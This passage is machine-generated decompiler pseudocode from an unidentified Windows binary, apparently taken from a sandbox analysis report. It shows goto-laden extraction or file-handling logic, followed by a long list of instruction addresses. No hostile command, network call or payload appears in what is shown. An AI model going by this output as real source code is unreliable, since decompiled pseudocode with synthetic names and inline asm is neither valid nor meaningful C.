																									 *(_t706 - 0x1c) = 0;
																									 *(_t706 - 0x28) = 0;
																									__eflags = _t672;
																									if(_t672 != 0) {
																										L127:
																										_t673 =  *(_t683 + 8);
																										__eflags =  *((char*)(_t673 + 0x6198));
																										 *((char*)(_t706 - 0x214d)) =  *((char*)(_t673 + 0x6198)) == 0;
																										__eflags =  *((char*)(_t706 - 0xf));
																										if( *((char*)(_t706 - 0xf)) != 0) {
																											L131:
																											_t434 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t706 - 0x24);
																											 *((char*)(_t706 - 0xe)) = _t608;
																											 *((char*)(_t706 - 0x12)) = _t434;
																											 *((char*)(_t706 - 0xd)) = _t434;
																											if( *(_t706 - 0x24) == 0) {
																												__eflags =  *(_t574 + 0x3318);
																												if( *(_t574 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t574 + 0x22a0));
																													if(__eflags != 0) {
																														E00272842(_t574,  *((intOrPtr*)(_t683 + 0xe0)), _t706,  *((intOrPtr*)(_t574 + 0x3374)),  *(_t574 + 0x3370) & 0x000000ff);
																														_t472 =  *((intOrPtr*)(_t683 + 0xe0));
																														 *(_t472 + 0x4c48) =  *(_t574 + 0x32e0);
																														__eflags = 0;
																														 *(_t472 + 0x4c4c) =  *(_t574 + 0x32e4);
																														 *((char*)(_t472 + 0x4c60)) = 0;
																														E002724D9( *((intOrPtr*)(_t683 + 0xe0)),  *((intOrPtr*)(_t574 + 0x229c)),  *(_t574 + 0x3370) & 0x000000ff); // executed
																													} else {
																														_push( *(_t574 + 0x32e4));
																														_push( *(_t574 + 0x32e0));
																														_push(_t698);
																														E0026910B(_t574, _t673, _t683, __eflags);
																													}
																												}
																												L163:
																												E00261E3B(_t574);
																												__eflags =  *((char*)(_t574 + 0x3319));
																												if( *((char*)(_t574 + 0x3319)) != 0) {
																													L166:
																													_t436 = 0;
																													__eflags = 0;
																													_t610 = 0;
																													L167:
																													__eflags =  *(_t574 + 0x3370);
																													if( *(_t574 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t574 + 0x22a0));
																														if( *((char*)(_t574 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t706 + 0xb);
																															 *((char*)(_t706 - 0xe)) = _t436;
																															if( *(_t706 + 0xb) != 0) {
																																L185:
																																__eflags =  *(_t706 - 0x24);
																																_t674 =  *((intOrPtr*)(_t706 - 0xd));
																																if( *(_t706 - 0x24) == 0) {
																																	L189:
																																	_t611 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t706 - 0xf));
																																	if( *((char*)(_t706 - 0xf)) != 0) {
																																		goto L212;
																																	}
																																	_t699 =  *(_t706 - 0x18);
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x30));
																																	if(_t699 ==  *((intOrPtr*)(_t706 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t706 - 0x24);
																																		if( *(_t706 - 0x24) == 0) {
																																			L197:
																																			__eflags = _t436;
																																			if(_t436 == 0) {
																																				L200:
																																				__eflags = _t611;
																																				if(_t611 != 0) {
																																					L208:
																																					_t437 =  *(_t683 + 8);
																																					__eflags =  *((char*)(_t437 + 0x61a0));
																																					if( *((char*)(_t437 + 0x61a0)) == 0) {
																																						_t700 = _t683 + 0x10f6;
																																						_t438 = E0026A12F(_t683 + 0x10f6,  *((intOrPtr*)(_t574 + 0x22a4))); // executed
																																						__eflags = _t438;
																																						if(__eflags == 0) {
																																							E00266BF5(__eflags, 0x11, _t574 + 0x1e, _t700);
																																						}
																																					}
																																					 *(_t683 + 0x10f5) = 1;
																																					goto L212;
																																				}
																																				_t675 =  *(_t706 - 0x28);
																																				__eflags = _t675;
																																				_t613 =  *(_t706 - 0x1c);
																																				if(_t675 > 0) {
																																					L203:
																																					__eflags = _t436;
																																					if(_t436 != 0) {
																																						L206:
																																						_t331 = _t706 - 0x2160; // -6496
																																						E00269BD6(_t331);
																																						L207:
																																						_t688 = _t574 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t339 = _t706 - 0x2160; // -6496
																																						E00269A7E(_t339, _t574 + 0x32d0,  ~( *( *(_t683 + 8) + 0x72c8)) & _t688,  ~( *( *(_t683 + 8) + 0x72cc)) & _t574 + 0x000032c8,  ~( *( *(_t683 + 8) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t340 = _t706 - 0x2160; // -6496
																																						E002694DA(_t340);
																																						E00267A12( *((intOrPtr*)(_t706 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)), _t574,  *((intOrPtr*)(_t706 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688;
																																						E00269A7B( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72c8)) & _t688,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t706 - 0x20)) + 8)) + 0x72d0)) & _t574 + 0x000032d0);
																																						_t683 =  *((intOrPtr*)(_t706 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x88)) - _t613;
																																					if( *((intOrPtr*)(_t683 + 0x88)) != _t613) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t683 + 0x8c)) - _t675;
																																					if( *((intOrPtr*)(_t683 + 0x8c)) == _t675) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t613;
																																				if(_t613 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t460 =  *(_t683 + 8);
																																			__eflags =  *((char*)(_t460 + 0x6198));
																																			if( *((char*)(_t460 + 0x6198)) == 0) {
																																				goto L212;
																																			}
																																			_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																			goto L200;
																																		}
																																		__eflags = _t611;
																																		if(_t611 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t574 + 0x3380) - 5;
																																		if( *(_t574 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t674;
																																		if(_t674 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t699 -  *((intOrPtr*)(_t706 - 0x34));
																																	if(_t699 !=  *((intOrPtr*)(_t706 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t574 + 0x3380) - 4;
																																if( *(_t574 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t674;
																																if(_t674 == 0) {
																																	goto L189;
																																}
																																_t611 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t706 - 0x12));
																															if( *((char*)(_t706 - 0x12)) == 0) {
																																goto L185;
																															}
																															__eflags = _t610;
																															if(_t610 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x331b)) - _t610;
																															if(__eflags == 0) {
																																L183:
																																_t311 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(3);
																																L184:
																																E00266BF5(__eflags);
																																 *((char*)(_t706 - 0xe)) = 1;
																																E00266E03(0x2a00e0, 3);
																																_t436 =  *((intOrPtr*)(_t706 - 0xe));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t574 + 0x3341)) - _t610;
																															if( *((intOrPtr*)(_t574 + 0x3341)) == _t610) {
																																L181:
																																__eflags =  *((char*)(_t683 + 0xf3));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t309 = _t706 - 0x113c; // -2364
																																_push(_t574 + 0x1e);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t574 + 0x6cc4) - _t610;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t574 + 0x32e4) - _t436;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t610;
																															if(_t610 != 0) {
																																 *((char*)(_t683 + 0xf3)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t574 + 0x32e0) - _t436;
																														if( *(_t574 + 0x32e0) <= _t436) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t683 + 0xf3)) = _t436;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t469 = E0026A6F6(_t683 + 0xc8, _t683, _t574 + 0x32f0,  ~( *(_t574 + 0x334a) & 0x000000ff) & _t574 + 0x0000334b);
																												__eflags = _t469;
																												if(_t469 == 0) {
																													goto L166;
																												}
																												_t610 = 1;
																												_t436 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t574 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_t262 = _t706 - 0x41a8; // -14760
																												E002680B1(_t683, __eflags, _t574, _t574 + 0x3384, _t262, 0x800);
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												__eflags = _t608;
																												if(_t608 == 0) {
																													L153:
																													_t479 =  *((intOrPtr*)(_t706 - 0xd));
																													L154:
																													__eflags =  *((intOrPtr*)(_t574 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t574 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t608;
																														if(_t608 == 0) {
																															L157:
																															_t480 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t683 + 0x10f5) = _t480;
																															goto L163;
																														}
																														L142:
																														__eflags = _t479;
																														if(_t479 == 0) {
																															goto L157;
																														}
																														_t480 = 1;
																														goto L158;
																													}
																													__eflags = _t608;
																													if(_t608 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t706 - 0x12)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t706 - 0x41a8));
																												if( *((short*)(_t706 - 0x41a8)) == 0) {
																													goto L153;
																												}
																												_t266 = _t706 - 0x41a8; // -14760
																												_push(0x800);
																												_push(_t683 + 0x10f6);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t574 + 0x1e);
																													_t269 = _t706 - 0x2160; // -6496
																													_t479 = E00269049(_t673, __eflags);
																												} else {
																													_t479 = E002674DD(_t608, __eflags);
																												}
																												L151:
																												 *((char*)(_t706 - 0xd)) = _t479;
																												__eflags = _t479;
																												if(_t479 == 0) {
																													L139:
																													_t608 =  *((intOrPtr*)(_t706 - 0xe));
																													goto L140;
																												}
																												_t608 =  *((intOrPtr*)(_t706 - 0xe));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t434;
																											if(_t702 == _t434) {
																												L144:
																												__eflags = _t608;
																												if(_t608 == 0) {
																													goto L153;
																												}
																												_push(_t683 + 0x10f6);
																												_t479 = E0026774C(_t673, _t683 + 0x10, _t574);
																												goto L151;
																											}
																											__eflags = _t702 - 2;
																											if(_t702 == 2) {
																												goto L144;
																											}
																											__eflags = _t702 - 3;
																											if(__eflags == 0) {
																												goto L144;
																											}
																											E00266BF5(__eflags, 0x47, _t574 + 0x1e, _t683 + 0x10f6);
																											__eflags = 0;
																											_t479 = 0;
																											 *((char*)(_t706 - 0xd)) = 0;
																											goto L139;
																										}
																										__eflags = _t432;
																										if(_t432 != 0) {
																											goto L131;
																										}
																										_t491 = 0x50;
																										__eflags =  *(_t706 - 0x18) - _t491;
																										if( *(_t706 - 0x18) == _t491) {
																											goto L131;
																										}
																										_t434 = 1;
																										_t608 = 1;
																										goto L132;
																									}
																									__eflags =  *(_t574 + 0x6cc4);
																									if( *(_t574 + 0x6cc4) != 0) {
																										goto L127;
																									}
																									_t703 =  *(_t574 + 0x32e4);
																									_t681 =  *(_t574 + 0x32e0);
																									__eflags = _t703;
																									if(__eflags < 0) {
																										L126:
																										_t698 = _t683 + 0x10;
																										goto L127;
																									}
																									if(__eflags > 0) {
																										L115:
																										_t631 =  *(_t574 + 0x32d8);
																										_t632 = _t631 << 0xa;
																										__eflags = ( *(_t574 + 0x32dc) << 0x00000020 | _t631) << 0xa - _t703;
																										if(__eflags < 0) {
																											L125:
																											_t432 =  *(_t706 + 0xb);
																											_t608 = 0;
																											__eflags = 0;
																											goto L126;
																										}
																										if(__eflags > 0) {
																											L118:
																											__eflags = _t703;
																											if(__eflags < 0) {
																												L124:
																												_t237 = _t706 - 0x2160; // -6496
																												E002698D5(_t237,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																												 *(_t706 - 0x1c) =  *(_t574 + 0x32e0);
																												 *(_t706 - 0x28) =  *(_t574 + 0x32e4);
																												goto L125;
																											}
																											if(__eflags > 0) {
																												L121:
																												_t499 = E002696E1(_t681);
																												__eflags = _t681 -  *(_t574 + 0x32dc);
																												if(__eflags < 0) {
																													goto L125;
																												}
																												if(__eflags > 0) {
																													goto L124;
																												}
																												__eflags = _t499 -  *(_t574 + 0x32d8);
																												if(_t499 <=  *(_t574 + 0x32d8)) {
																													goto L125;
																												}
																												goto L124;
																											}
																											__eflags = _t681 - 0x5f5e100;
																											if(_t681 < 0x5f5e100) {
																												goto L124;
																											}
																											goto L121;
																										}
																										__eflags = _t632 - _t681;
																										if(_t632 <= _t681) {
																											goto L125;
																										}
																										goto L118;
																									}
																									__eflags = _t681 - 0xf4240;
																									if(_t681 <= 0xf4240) {
																										goto L126;
																									}
																									goto L115;
																								}
																								L109:
																								_t198 = _t683 + 0xe4;
																								 *_t198 =  *(_t683 + 0xe4) + 1;
																								__eflags =  *_t198;
																								goto L110;
																							}
																							 *((char*)(_t706 - 0xf)) = 0;
																							_t501 = 0x50;
																							__eflags = _t696 - _t501;
																							if(_t696 != _t501) {
																								_t192 = _t706 - 0x2160; // -6496
																								__eflags = E00269745(_t192);
																								if(__eflags != 0) {
																									E00266BF5(__eflags, 0x3b, _t574 + 0x1e, _t683 + 0x10f6);
																									E00266E9B(0x2a00e0, _t706, _t574 + 0x1e, _t683 + 0x10f6);
																								}
																							}
																							goto L109;
																						}
																						 *(_t683 + 0x10f5) = 1;
																						__eflags =  *((char*)(_t422 + 0x61f9));
																						if( *((char*)(_t422 + 0x61f9)) != 0) {
																							_t423 =  *(_t706 + 0xb);
																							goto L108;
																						}
																						goto L103;
																					}
																					 *(_t706 + 0xb) = 1;
																					 *(_t706 + 0xf) = 1;
																					_t182 = _t706 - 0x113c; // -2364
																					_t511 = E00270FD9(_t601, _t182, 0, 0, 1);
																					__eflags = _t511;
																					if(_t511 != 0) {
																						goto L101;
																					}
																					__eflags = 0;
																					 *(_t706 - 0x1c) = 0;
																					L99:
																					_t184 = _t706 - 0x2160; // -6496
																					E0026946E(_t184);
																					_t393 =  *(_t706 - 0x1c);
																					goto L16;
																				}
																				_t174 = _t706 - 0x2160; // -6496
																				_push(_t574);
																				_t515 = E00267F5F(_t683);
																				_t696 =  *(_t706 - 0x18);
																				_t601 = _t515;
																				 *(_t706 + 0xf) = _t601;
																				L93:
																				__eflags = _t601;
																				if(_t601 != 0) {
																					goto L101;
																				}
																				goto L96;
																			}
																			__eflags =  *(_t706 + 0xf);
																			if( *(_t706 + 0xf) != 0) {
																				_t516 =  *(_t706 - 0x18);
																				__eflags = _t516 - 0x50;
																				if(_t516 != 0x50) {
																					_t639 = 0x49;
																					__eflags = _t516 - _t639;
																					if(_t516 != _t639) {
																						_t640 = 0x45;
																						__eflags = _t516 - _t640;
																						if(_t516 != _t640) {
																							_t517 =  *(_t683 + 8);
																							__eflags =  *((intOrPtr*)(_t517 + 0x6158)) - 1;
																							if( *((intOrPtr*)(_t517 + 0x6158)) != 1) {
																								 *(_t683 + 0xe4) =  *(_t683 + 0xe4) + 1;
																								_t172 = _t706 - 0x113c; // -2364
																								_push(_t574);
																								E00267D9B(_t683);
																							}
																						}
																					}
																				}
																			}
																			goto L99;
																		}
																		__eflags = _t418 - 5;
																		if(_t418 == 5) {
																			goto L83;
																		}
																		_t601 =  *(_t706 + 0xf);
																		_t696 =  *(_t706 - 0x18);
																		__eflags = _t601;
																		if(_t601 == 0) {
																			goto L96;
																		}
																		__eflags = _t696 - _t670;
																		if(_t696 == _t670) {
																			goto L93;
																		}
																		_t520 =  *(_t683 + 8);
																		__eflags =  *((char*)(_t520 + 0x61f9));
																		if( *((char*)(_t520 + 0x61f9)) != 0) {
																			goto L93;
																		}
																		 *((char*)(_t706 - 0xf)) = 0;
																		_t523 = E00269E6B(_t683 + 0x10f6);
																		__eflags = _t523;
																		if(_t523 == 0) {
																			L81:
																			__eflags =  *((char*)(_t706 - 0xf));
																			if( *((char*)(_t706 - 0xf)) == 0) {
																				_t601 =  *(_t706 + 0xf);
																				goto L93;
																			}
																			L82:
																			_t601 = 0;
																			 *(_t706 + 0xf) = 0;
																			goto L93;
																		}
																		__eflags =  *((char*)(_t706 - 0xf));
																		if( *((char*)(_t706 - 0xf)) != 0) {
																			goto L82;
																		}
																		__eflags = 0;
																		_push(0);
																		_push(_t574 + 0x32c0);
																		_t160 = _t706 - 0xf; // 0x7f1
																		E0026919C(0,  *(_t683 + 8), 0, _t683 + 0x10f6, 0x800, _t160,  *(_t574 + 0x32e0),  *(_t574 + 0x32e4));
																		goto L81;
																	}
																	__eflags =  *((char*)(_t574 + 0x3341));
																	if( *((char*)(_t574 + 0x3341)) == 0) {
																		goto L73;
																	}
																	_t132 = _t706 - 0x2c; // 0x7d4
																	_t531 = E0027F3CA(_t574 + 0x3342, _t132, 8);
																	_t708 = _t710 + 0xc;
																	__eflags = _t531;
																	if(_t531 == 0) {
																		goto L73;
																	}
																	__eflags =  *(_t574 + 0x6cc4);
																	if( *(_t574 + 0x6cc4) != 0) {
																		goto L73;
																	}
																	__eflags =  *((char*)(_t683 + 0x10f4));
																	_t136 = _t706 - 0x113c; // -2364
																	_push(_t574 + 0x1e);
																	if(__eflags != 0) {
																		_push(6);
																		E00266BF5(__eflags);
																		E00266E03(0x2a00e0, 0xb);
																		__eflags = 0;
																		 *(_t706 + 0xf) = 0;
																		goto L73;
																	}
																	_push(0x7d);
																	E00266BF5(__eflags);
																	E0026E797( *(_t683 + 8) + 0x5024);
																	 *(_t706 - 4) =  *(_t706 - 4) | 0xffffffff;
																	_t141 = _t706 - 0x13c; // 0x6c4
																	L0026E724(_t141);
																}
															}
															E00266E03(0x2a00e0, 2);
															_t543 = E00261E3B(_t574);
															__eflags =  *((char*)(_t574 + 0x6cb4));
															_t393 = _t543 & 0xffffff00 |  *((char*)(_t574 + 0x6cb4)) == 0x00000000;
															goto L16;
														}
														_t100 = _t706 - 0x2198; // -6552
														_t545 = E00267BBB(_t100, _t574 + 0x32c0);
														__eflags = _t545;
														if(_t545 == 0) {
															goto L61;
														}
														__eflags =  *((char*)(_t706 - 0x219c));
														if( *((char*)(_t706 - 0x219c)) == 0) {
															L59:
															 *(_t706 + 0xf) = 0;
															goto L61;
														}
														_t102 = _t706 - 0x2198; // -6552
														_t547 = E00267B9D(_t102, _t683);
														__eflags = _t547;
														if(_t547 == 0) {
															goto L61;
														}
														goto L59;
													}
													__eflags = _t692 - _t668;
													if(_t692 != _t668) {
														goto L61;
													}
													goto L55;
												}
												__eflags =  *((char*)(_t398 + 0x6154));
												if( *((char*)(_t398 + 0x6154)) == 0) {
													goto L61;
												}
												goto L53;
											}
											__eflags =  *(_t683 + 0x10f6);
											if( *(_t683 + 0x10f6) == 0) {
												goto L50;
											}
											 *(_t706 + 0xf) = 1;
											__eflags =  *(_t574 + 0x3318);
											if( *(_t574 + 0x3318) == 0) {
												goto L51;
											}
											goto L50;
										}
										__eflags = _t692 - _t387;
										_t388 = 1;
										if(_t692 != _t387) {
											goto L46;
										}
										goto L45;
									}
									_t671 =  *((intOrPtr*)(_t574 + 0x6cb4));
									 *(_t706 + 0xb) = _t671;
									 *(_t706 + 0xc) = _t671;
									__eflags = _t671;
									if(_t671 == 0) {
										goto L214;
									} else {
										_t667 = 0;
										__eflags = 0;
										goto L43;
									}
								}
								__eflags =  *(_t683 + 0xec) -  *((intOrPtr*)(_t577 + 0xa32c));
								if( *(_t683 + 0xec) <  *((intOrPtr*)(_t577 + 0xa32c))) {
									goto L29;
								}
								__eflags =  *((char*)(_t683 + 0xf1));
								if( *((char*)(_t683 + 0xf1)) != 0) {
									goto L219;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t574 + 0x32e0) = _t665;
								 *(_t574 + 0x32e4) = _t665;
								goto L26;
							}
							__eflags =  *(_t574 + 0x32e0) - _t665;
							if( *(_t574 + 0x32e0) >= _t665) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t574 + 0x32d8) = _t665;
							 *(_t574 + 0x32dc) = _t665;
							goto L22;
						}
						__eflags =  *(_t574 + 0x32d8) - _t665;
						if( *(_t574 + 0x32d8) >= _t665) {
							goto L22;
						}
						goto L21;
					}
					__eflags = _t690 - 3;
					if(_t690 != 3) {
						L10:
						__eflags = _t690 - 5;
						if(_t690 != 5) {
							goto L217;
						}
						__eflags =  *((char*)(_t574 + 0x45ac));
						if( *((char*)(_t574 + 0x45ac)) == 0) {
							goto L219;
						}
						_push( *(_t706 - 0x18));
						_push(0);
						_push(_t683 + 0x10);
						_push(_t574);
						_t564 = E002780D0(_t665);
						__eflags = _t564;
						if(_t564 != 0) {
							__eflags = 0;
							 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca0)),  *((intOrPtr*)(_t574 + 0x6ca4)), 0);
							goto L15;
						} else {
							E00266E03(0x2a00e0, 1);
							goto L219;
						}
					}
					__eflags =  *(_t683 + 0x10f5);
					if( *(_t683 + 0x10f5) == 0) {
						goto L217;
					} else {
						E002679A7(_t574, _t706,  *(_t683 + 8), _t574, _t683 + 0x10f6);
						goto L10;
					}
				}
				if( *((intOrPtr*)(_t683 + 0x5f)) == 0) {
					L4:
					_t393 = 0;
					goto L17;
				}
				_push(_t370);
				_push(0);
				_push(_t683 + 0x10);
				_push(_t574);
				if(E002780D0(0) != 0) {
					_t665 = 0;
					__eflags = 0;
					goto L6;
				} else {
					E00266E03(0x2a00e0, 1);
					goto L4;
				}
			}

0x002683c0
0x002683c5
0x002683cf
0x002683d5
0x002683d8
0x002683db
0x002683dd
0x002683e3
0x002683ea
0x002683f0
0x0026841c
0x0026841d
0x00268423
0x00268426
0x002684b5
0x002684bb
0x002684c1
0x002684d9
0x002684d9
0x002684df
0x002684f7
0x002684f7
0x002684fa
0x00268500
0x0026851d
0x00268522
0x00268526
0x00268530
0x0026853b
0x00268540
0x00268542
0x00268545
0x00268548
0x0026854a
0x0026854c
0x00268550
0x00268552
0x00268554
0x00268554
0x00268550
0x0026855c
0x00268561
0x00268562
0x0026856f
0x00268570
0x00268578
0x0026857f
0x00268582
0x002685d9
0x002685de
0x002685e0
0x002685e2
0x002685e8
0x002685ee
0x002685f2
0x002685f2
0x002685f2
0x002685f2
0x00268584
0x00268587
0x0026858d
0x0026858f
0x00268591
0x00268595
0x00268597
0x0026859e
0x002685a3
0x002685a4
0x002685ab
0x002685b0
0x002685ba
0x002685bc
0x002685d2
0x002685be
0x002685c0
0x002685c7
0x002685c9
0x002685c9
0x002685bc
0x00268595
0x0026858f
0x002685fb
0x00268600
0x00268618
0x00268622
0x00268625
0x00268627
0x0026862b
0x0026862e
0x00268631
0x00268634
0x0026864c
0x0026864f
0x00268654
0x0026865a
0x0026865b
0x0026865d
0x00268666
0x00268666
0x00268668
0x0026866b
0x00268675
0x0026867c
0x00268681
0x00268683
0x00269042
0x00269042
0x002684a2
0x002684a3
0x002684a8
0x002684b2
0x002684b2
0x00268697
0x0026869a
0x002686a2
0x002686a9
0x002686ac
0x002686c3
0x002686c3
0x002686c6
0x002686c6
0x002686cb
0x002686ce
0x002686d5
0x002686d6
0x002686d9
0x002686dc
0x002686e7
0x002686e7
0x002686ea
0x002686f1
0x002686f1
0x002686f7
0x002686fe
0x002686ff
0x0026870d
0x00268712
0x00268714
0x0026874c
0x0026874f
0x0026875b
0x0026875b
0x0026875b
0x0026875e
0x0026875e
0x00268768
0x0026876d
0x0026876f
0x00268793
0x00268793
0x0026879a
0x00000000
0x00000000
0x0026879c
0x002687a6
0x002687ab
0x002687ad
0x0026888c
0x00000000
0x0026888c
0x002687b3
0x002687b6
0x002687c4
0x002687c5
0x002687c5
0x002687c7
0x002687d0
0x002687d3
0x002687df
0x002687f2
0x002687fc
0x0026880e
0x00268813
0x0026881a
0x002688b0
0x002688b0
0x002688b4
0x002688ba
0x002688bf
0x002688c5
0x002688ca
0x002688d0
0x002688d7
0x002688dc
0x002688dd
0x002688df
0x00268972
0x00268974
0x00268979
0x0026897b
0x002689cd
0x002689d0
0x002689d2
0x002689f6
0x002689f9
0x002689f9
0x00268a00
0x00268a38
0x00268a3a
0x00268ff7
0x00268ff7
0x00268ffb
0x00269001
0x00269006
0x0026900a
0x0026900d
0x00269010
0x00269012
0x00269012
0x00269012
0x00269012
0x00269018
0x00269018
0x0026901c
0x00000000
0x00000000
0x0026901e
0x00269020
0x002684a0
0x002684a0
0x00000000
0x002684a0
0x00269026
0x0026902c
0x0026903a
0x0026903c
0x00000000
0x00000000
0x00000000
0x0026903c
0x0026902e
0x00269030
0x00000000
0x00269030
0x00268a40
0x00268a40
0x00268a43
0x00268a4a
0x00268a5c
0x00268a5c
0x00268a5f
0x00268a61
0x00268aa8
0x00268aa8
0x00268aac
0x00268aae
0x00268ab6
0x00268ab6
0x00268aca
0x00268ad0
0x00268ad6
0x00268adc
0x00268aed
0x00268b03
0x00268b0e
0x00268b17
0x00268b1a
0x00268b21
0x00268b27
0x00268b2c
0x00268b2f
0x00268b31
0x00268b34
0x00268b37
0x00268b3a
0x00268b3d
0x00268b40
0x00268b42
0x00268be5
0x00268be5
0x00268be8
0x00268bef
0x00268bf6
0x00268bfa
0x00268c10
0x00268c12
0x00268c12
0x00268c13
0x00268c13
0x00268c17
0x00268c1a
0x00268c1d
0x00268c20
0x00268d2c
0x00268d33
0x00268d35
0x00268d3c
0x00268d66
0x00268d6b
0x00268d7d
0x00268d83
0x00268d85
0x00268d8b
0x00268da5
0x00268d3e
0x00268d3e
0x00268d44
0x00268d4a
0x00268d4b
0x00268d4b
0x00268d3c
0x00268daa
0x00268dac
0x00268db1
0x00268db8
0x00268dea
0x00268dea
0x00268dea
0x00268dec
0x00268dee
0x00268dee
0x00268df5
0x00268dff
0x00268e06
0x00268e25
0x00268e25
0x00268e29
0x00268e2c
0x00268e8d
0x00268e8d
0x00268e91
0x00268e94
0x00268ea7
0x00268ea7
0x00268ea7
0x00268ea9
0x00268ea9
0x00268ead
0x00000000
0x00000000
0x00268eb3
0x00268eb6
0x00268eba
0x00268ec6
0x00268ec6
0x00268eca
0x00268ee5
0x00268ee5
0x00268ee7
0x00268efc
0x00268efc
0x00268efe
0x00268fc2
0x00268fc2
0x00268fc5
0x00268fcc
0x00268fd4
0x00268fdb
0x00268fe0
0x00268fe2
0x00268feb
0x00268feb
0x00268fe2
0x00268ff0
0x00000000
0x00268ff0
0x00268f04
0x00268f09
0x00268f0b
0x00268f0e
0x00268f14
0x00268f14
0x00268f16
0x00268f28
0x00268f28
0x00268f2e
0x00268f33
0x00268f3c
0x00268f50
0x00268f57
0x00268f6a
0x00268f6c
0x00268f75
0x00268f7a
0x00268f80
0x00268f8f
0x00268fa2
0x00268fb5
0x00268fb7
0x00268fba
0x00268fbf
0x00000000
0x00268fbf
0x00268f18
0x00268f1e
0x00000000
0x00000000
0x00268f20
0x00268f26
0x00000000
0x00000000
0x00000000
0x00268f26
0x00268f10
0x00268f12
0x00000000
0x00000000
0x00000000
0x00268f12
0x00268ee9
0x00268eec
0x00268ef3
0x00000000
0x00000000
0x00268ef9
0x00000000
0x00268ef9
0x00268ecc
0x00268ece
0x00000000
0x00000000
0x00268ed0
0x00268ed7
0x00000000
0x00000000
0x00268edd
0x00268edf
0x00000000
0x00000000
0x00000000
0x00268edf
0x00268ebc
0x00268ec0
0x00000000
0x00000000
0x00000000
0x00268ec0
0x00268e96
0x00268e9d
0x00000000
0x00000000
0x00268e9f
0x00268ea1
0x00000000
0x00000000
0x00268ea3
0x00000000
0x00268ea3
0x00268e2e
0x00268e32
0x00000000
0x00000000
0x00268e34
0x00268e36
0x00000000
0x00000000
0x00268e38
0x00268e3e
0x00268e68
0x00268e68
0x00268e72
0x00268e73
0x00268e75
0x00268e75
0x00268e81
0x00268e85
0x00268e8a
0x00000000
0x00268e8a
0x00268e40
0x00268e46
0x00268e50
0x00268e50
0x00268e57
0x00000000
0x00000000
0x00268e59
0x00268e63
0x00268e64
0x00000000
0x00268e64
0x00268e48
0x00268e4e
0x00000000
0x00000000
0x00000000
0x00268e4e
0x00268e08
0x00268e0e
0x00000000
0x00000000
0x00268e10
0x00268e1a
0x00268e1a
0x00268e1c
0x00268e1e
0x00268e1e
0x00000000
0x00268e1c
0x00268e12
0x00268e18
0x00000000
0x00000000
0x00000000
0x00268e18
0x00268df7
0x00000000
0x00268df7
0x00268dcf
0x00268ddb
0x00268de0
0x00268de2
0x00000000
0x00000000
0x00268de4
0x00268de6
0x00000000
0x00268de6
0x00268c26
0x00268c2c
0x00268c2f
0x00268c98
0x00268c9d
0x00268cae
0x00268cb3
0x00268cb6
0x00268cb8
0x00268d05
0x00268d05
0x00268d08
0x00268d08
0x00268d0f
0x00268c64
0x00268c64
0x00268c66
0x00268d22
0x00268d22
0x00268d22
0x00268d24
0x00268d24
0x00000000
0x00268d24
0x00268c6c
0x00268c6c
0x00268c6e
0x00000000
0x00000000
0x00268c76
0x00000000
0x00268c76
